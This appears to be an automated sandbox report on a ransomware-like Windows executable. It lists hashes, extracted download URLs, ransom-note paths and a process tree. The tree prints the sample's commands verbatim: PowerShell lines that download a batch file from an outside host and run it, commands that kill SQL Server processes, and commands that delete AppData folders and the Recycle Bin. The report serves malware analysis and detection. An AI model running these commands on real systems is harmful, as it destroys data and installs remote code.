Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
87s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
02/05/2022, 15:17
Static task
static1
Behavioral task
behavioral1
Sample
05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe
Resource
win7-20220414-en
General
-
Target
05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe
-
Size
2.8MB
-
MD5
2079b5f7cb45b9509fc153071dec87de
-
SHA1
488a6a91ed2d177e70c657863513d2431082da8c
-
SHA256
05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e
-
SHA512
d06bfb35cd83d124f76483c111b7c996d7573b0bb843144f2e454bb7ddb92320819b06e93054601d99e1650f7f7421373087d38533c4d5966e6169eb03a8ce16
Malware Config
Extracted
http://e-service.iag.bg/App_Themes/Efa/clear.txt
Extracted
http://e-service.iag.bg/App_Themes/Efa/video.mp4
Extracted
C:\HELP_DECRYPT_YOUR_FILES.txt
https://t.me/HELP_DECRYPT_YOUR_FILES
Extracted
C:\HELP_DECRYPT_YOUR_FILES.html
https://t.me/HELP_DECRYPT_YOUR_FILES</p>
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 1396 powershell.exe 7 280 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Kills process with taskkill 3 IoCs
pid Process 2028 taskkill.exe 1796 taskkill.exe 1180 taskkill.exe -
Modifies registry class 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.secure\DefaultIcon\ = "C:\\Windows\\System32\\SHELL32.dll,271" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.secure\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.secure reg.exe -
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 5 IoCs
pid Process 1396 powershell.exe 280 powershell.exe 796 powershell.exe 1696 powershell.exe 1228 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1396 powershell.exe 280 powershell.exe 796 powershell.exe 1696 powershell.exe 1228 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2028 taskkill.exe Token: SeDebugPrivilege 1796 taskkill.exe Token: SeDebugPrivilege 1180 taskkill.exe Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 280 powershell.exe Token: SeDebugPrivilege 796 powershell.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeDebugPrivilege 1228 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1912 wrote to memory of 1012 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 29 PID 1912 wrote to memory of 1012 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 29 PID 1912 wrote to memory of 1012 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 29 PID 1012 wrote to memory of 1552 1012 cmd.exe 30 PID 1012 wrote to memory of 1552 1012 cmd.exe 30 PID 1012 wrote to memory of 1552 1012 cmd.exe 30 PID 1912 wrote to memory of 1420 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 31 PID 1912 wrote to memory of 1420 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 31 PID 1912 wrote to memory of 1420 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 31 PID 1420 wrote to memory of 632 1420 cmd.exe 32 PID 1420 wrote to memory of 632 1420 cmd.exe 32 PID 1420 wrote to memory of 632 1420 cmd.exe 32 PID 1912 wrote to memory of 320 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 33 PID 1912 wrote to memory of 320 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 33 PID 1912 wrote to memory of 320 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 33 PID 320 wrote to memory of 2028 320 cmd.exe 34 PID 320 wrote to memory of 2028 320 cmd.exe 34 PID 320 wrote to memory of 2028 320 cmd.exe 34 PID 1912 wrote to memory of 1772 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 36 PID 1912 wrote to memory of 1772 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 36 PID 1912 wrote to memory of 1772 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 36 PID 1772 wrote to memory of 1796 1772 cmd.exe 37 PID 1772 wrote to memory of 1796 1772 cmd.exe 37 PID 1772 wrote to memory of 1796 1772 cmd.exe 37 PID 1912 wrote to memory of 640 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 38 PID 1912 wrote to memory of 640 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 38 PID 1912 wrote to memory of 640 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 38 PID 640 wrote to memory of 1180 640 cmd.exe 39 PID 640 wrote to memory of 1180 640 cmd.exe 39 PID 640 wrote to memory of 1180 640 cmd.exe 39 PID 1912 wrote to memory of 1564 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 40 PID 1912 wrote to memory of 1564 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 40 PID 1912 wrote to memory of 1564 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 40 PID 1912 wrote to memory of 1168 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 41 PID 1912 wrote to memory of 1168 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 41 PID 1912 wrote to memory of 1168 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 41 PID 1912 wrote to memory of 1932 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 42 PID 1912 wrote to memory of 1932 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 42 PID 1912 wrote to memory of 1932 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 42 PID 1912 wrote to memory of 1856 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 43 PID 1912 wrote to memory of 1856 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 43 PID 1912 wrote to memory of 1856 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 43 PID 1856 wrote to memory of 1248 1856 cmd.exe 44 PID 1856 wrote to memory of 1248 1856 cmd.exe 44 PID 1856 wrote to memory of 1248 1856 cmd.exe 44 PID 1912 wrote to memory of 676 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 45 PID 1912 wrote to memory of 676 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 45 PID 1912 wrote to memory of 676 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 45 PID 676 wrote to memory of 792 676 cmd.exe 46 PID 676 wrote to memory of 792 676 cmd.exe 46 PID 676 wrote to memory of 792 676 cmd.exe 46 PID 792 wrote to memory of 572 792 net.exe 47 PID 792 wrote to memory of 572 792 net.exe 47 PID 792 wrote to memory of 572 792 net.exe 47 PID 1912 wrote to memory of 544 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 48 PID 1912 wrote to memory of 544 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 48 PID 1912 wrote to memory of 544 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 48 PID 1912 wrote to memory of 992 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 49 PID 1912 wrote to memory of 992 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 49 PID 1912 wrote to memory of 992 1912 05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe 49 PID 992 wrote to memory of 1396 992 cmd.exe 50 PID 992 wrote to memory of 1396 992 cmd.exe 50 PID 992 wrote to memory of 1396 992 cmd.exe 50 PID 992 wrote to memory of 1396 992 cmd.exe 50 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1248 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe"C:\Users\Admin\AppData\Local\Temp\05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\system32\cmd.execmd /C "label C: Encrypted"2⤵
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\system32\label.exelabel C: Encrypted3⤵PID:1552
-
-
-
C:\Windows\system32\cmd.execmd /C "reg add HKEY_CLASSES_ROOT\.secure\DefaultIcon /t REG_SZ /d %SystemRoot%\System32\SHELL32.dll,271 /f"2⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\system32\reg.exereg add HKEY_CLASSES_ROOT\.secure\DefaultIcon /t REG_SZ /d C:\Windows\System32\SHELL32.dll,271 /f3⤵
- Modifies registry class
PID:632
-
-
-
C:\Windows\system32\cmd.execmd /C "taskkill /F /IM sqlservr.exe /T"2⤵
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\system32\taskkill.exetaskkill /F /IM sqlservr.exe /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
-
C:\Windows\system32\cmd.execmd /C "taskkill /F /IM sqlceip.exe /T"2⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\system32\taskkill.exetaskkill /F /IM sqlceip.exe /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
-
C:\Windows\system32\cmd.execmd /C "taskkill /F /IM sqlwriter.exe /T"2⤵
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\system32\taskkill.exetaskkill /F /IM sqlwriter.exe /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
-
-
C:\Windows\system32\cmd.execmd /C "rmdir C:\Users\Admin\AppData /s /q"2⤵PID:1564
-
-
C:\Windows\system32\cmd.execmd /C "rmdir C:\Users\Default\AppData /s /q"2⤵PID:1168
-
-
C:\Windows\system32\cmd.execmd /C "rmdir C:\Users\Public\AppData /s /q"2⤵PID:1932
-
-
C:\Windows\system32\cmd.execmd /C "attrib +h +s Crypto.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\system32\attrib.exeattrib +h +s Crypto.exe3⤵
- Views/modifies file attributes
PID:1248
-
-
-
C:\Windows\system32\cmd.execmd /C "net stop MSSQL$SQLEXPRESS"2⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\system32\net.exenet stop MSSQL$SQLEXPRESS3⤵
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵PID:572
-
-
-
-
C:\Windows\system32\cmd.execmd /C "rmdir C:\$Recycle.Bin /s /q"2⤵PID:544
-
-
C:\Windows\system32\cmd.execmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell(New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/clear.txt', 'C:\Users\Public\Music\clear.bat')"2⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\windows\syswow64\windowspowershell\v1.0\powershell.exeC:\windows\syswow64\windowspowershell\v1.0\powershell (New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/clear.txt', 'C:\Users\Public\Music\clear.bat')3⤵
- Blocklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell(New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/video.mp4', 'C:\Users\Public\Music\video.mp4')"2⤵PID:700
-
C:\windows\syswow64\windowspowershell\v1.0\powershell.exeC:\windows\syswow64\windowspowershell\v1.0\powershell (New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/video.mp4', 'C:\Users\Public\Music\video.mp4')3⤵
- Blocklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:280
-
-
-
C:\Windows\system32\cmd.execmd /C C:\Users\Public\Music\clear.bat2⤵PID:1424
-
-
C:\Windows\system32\cmd.execmd /C "copy C:\Users\Public\Music\video.mp4 C:\Watch-me.mp4"2⤵PID:1600
-
-
C:\Windows\system32\cmd.execmd /C "copy C:\Users\Public\Music\video.mp4 C:\Users\Admin\Desktop\Watch-me.mp4"2⤵PID:1724
-
-
C:\Windows\system32\cmd.execmd /C "copy C:\Users\Public\Music\video.mp4 C:\Users\Default\Desktop\Watch-me.mp4"2⤵PID:1740
-
-
C:\Windows\system32\cmd.execmd /C "copy C:\Users\Public\Music\video.mp4 C:\Users\Public\Desktop\Watch-me.mp4"2⤵PID:532
-
-
C:\Windows\system32\cmd.execmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell copy C:\Users\Public\Music\video.mp4 \"C:\Users\Admin/AppData/Roaming/Microsoft/Windows/Network Shortcuts/Watch-me.mp4\""2⤵PID:1852
-
C:\windows\syswow64\windowspowershell\v1.0\powershell.exeC:\windows\syswow64\windowspowershell\v1.0\powershell copy C:\Users\Public\Music\video.mp4 \"C:\Users\Admin/AppData/Roaming/Microsoft/Windows/Network Shortcuts/Watch-me.mp4\"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:796
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell copy C:\Users\Public\Music\video.mp4 \"C:\Users\Default/AppData/Roaming/Microsoft/Windows/Network Shortcuts/Watch-me.mp4\""2⤵PID:960
-
C:\windows\syswow64\windowspowershell\v1.0\powershell.exeC:\windows\syswow64\windowspowershell\v1.0\powershell copy C:\Users\Public\Music\video.mp4 \"C:\Users\Default/AppData/Roaming/Microsoft/Windows/Network Shortcuts/Watch-me.mp4\"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell copy C:\Users\Public\Music\video.mp4 \"C:\Users\Public/AppData/Roaming/Microsoft/Windows/Network Shortcuts/Watch-me.mp4\""2⤵PID:1856
-
C:\windows\syswow64\windowspowershell\v1.0\powershell.exeC:\windows\syswow64\windowspowershell\v1.0\powershell copy C:\Users\Public\Music\video.mp4 \"C:\Users\Public/AppData/Roaming/Microsoft/Windows/Network Shortcuts/Watch-me.mp4\"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-